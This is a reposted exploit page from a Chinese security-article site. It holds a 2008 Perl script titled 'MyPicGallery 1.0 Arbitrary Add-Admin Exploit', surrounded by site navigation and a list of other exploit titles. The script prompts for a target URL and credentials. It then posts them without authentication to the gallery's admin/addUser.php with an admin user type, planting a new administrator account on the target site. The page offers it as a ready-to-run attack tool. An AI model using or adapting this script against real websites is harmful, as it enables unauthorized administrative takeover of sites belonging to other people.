MyPicGallery 1.0 Arbitrary Add-Admin Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

MyPicGallery 1.0 Arbitrary Add-Admin Exploit

来源：h4ck-y0u 作者：t0pP8uZz 发布时间：2008-05-19

#!/usr/bin/perl

use strict;
use LWP::UserAgent;

print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n";
print "-+--        Discovered && Coded By: t0pP8uZz        --+-\n";
print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n";
print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n";

print "\nEnter URL(http://site.com): ";
chomp(my $url=<STDIN>);

print "\nEnter Username(create's a admin username): ";
chomp(my $usr=<STDIN>);

print "\nEnter Password(create's a admin password): ";
chomp(my $pwd=<STDIN>);

my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob = $ua->post( $url."/admin/addUser.php?userID=admin", { "submit" => 1, # ugly?
"fullName"    => "null",
"userName"    => $usr,
"password"    => $pwd,
"conPassword" => $pwd,
"uType"       => "admin",
"email"       => "null\@null.com" } );

if($ob->is_success && index($ob->content, "added") != -1) {
print "\nAdmin Account Added! Login at: ".$url."\n";
} else { print "\nExploit Failed! username already exists?"; }

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告